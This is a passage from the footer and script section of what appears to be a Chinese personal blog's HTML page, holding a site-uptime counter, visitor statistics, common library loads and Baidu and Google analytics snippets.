        window.setTimeout("siteTime()", 1000);
        var seconds = 1000;
        var minutes = seconds * 60;
        var hours = minutes * 60;
        var days = hours * 24;
        var years = days * 365;
        var today = new Date();
        var todayYear = today.getFullYear();
        var todayMonth = today.getMonth() + 1;
        var todayDate = today.getDate();
        var todayHour = today.getHours();
        var todayMinute = today.getMinutes();
        var todaySecond = today.getSeconds();
        /* 
      Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
      year - 作为date对象的年份，为4位年份值
      month - 0-11之间的整数，做为date对象的月份
      day - 1-31之间的整数，做为date对象的天数
      hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
      minutes - 0-59之间的整数，做为date对象的分钟数
      seconds - 0-59之间的整数，做为date对象的秒数
      microseconds - 0-999之间的整数，做为date对象的毫秒数
     */
        var t1 = Date.UTC(2021, 05, 01, 00, 00, 00); //北京时间2018-2-13 00:00:00
        var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
        var diff = t2 - t1;
        var diffYears = Math.floor(diff / years);
        var diffDays = Math.floor((diff / days) - diffYears * 365);
        var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
        var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) / minutes);
        var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours - diffMinutes * minutes) / seconds);
        document.getElementById("sitetime").innerHTML = "很高兴遇到你，我已经在此等候了你 " + /*diffYears+" 年 "+*/ diffDays + " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
    }
    siteTime();
</script>

    <div class="statistics">
        
            

                
                                                
                                                    <!-- 不蒜子统计PV -->
                                                    <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            
            <span id="busuanzi_value_site_pv"></span>
                                                     次
                                                        &nbsp; <span class="iconfont icon-love"></span></span>
                                                        

                                                            

                                                                <!-- 不蒜子统计UV -->
                                                                <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            
            <span id="busuanzi_value_site_uv"></span>
                                                                 人
                                                                    </span>
                                                                    
                                                                        
    </div>
    
  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.2/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>












    
        <!-- Baidu Analytics -->
        <script defer>
            var _hmt = _hmt || [];
            (function() {
                var hm = document.createElement("script");
                hm.src = "https://hm.baidu.com/hm.js?a1a4ccab78dfa522556928ac810fa739";
                var s = document.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(hm, s);
            })();
        </script>
        

            
                <!-- Google Analytics -->
                <!-- <script defer>
      window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments) };
      ga.l = +new Date;
      ga('create', 'G-4X9XV0H0D5', 'auto');
      ga('send', 'pageview');
    </script>
    <script async src='https://www.google-analytics.com/analytics.js'></script> -->
                <!-- Global site tag (gtag.js) - Google Analytics -->
                <script async src="https://www.googletagmanager.com/gtag/js?G-4X9XV0H0D5"></script>
                <script>
                    window.dataLayer = window.dataLayer || [];

                    function gtag() {
                        dataLayer.push(arguments);
                    }
                    gtag('js', new Date());

                    gtag('config', 'G-4X9XV0H0D5');
                </script>
                

                    

                            

                                    

                                            
                                                    



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
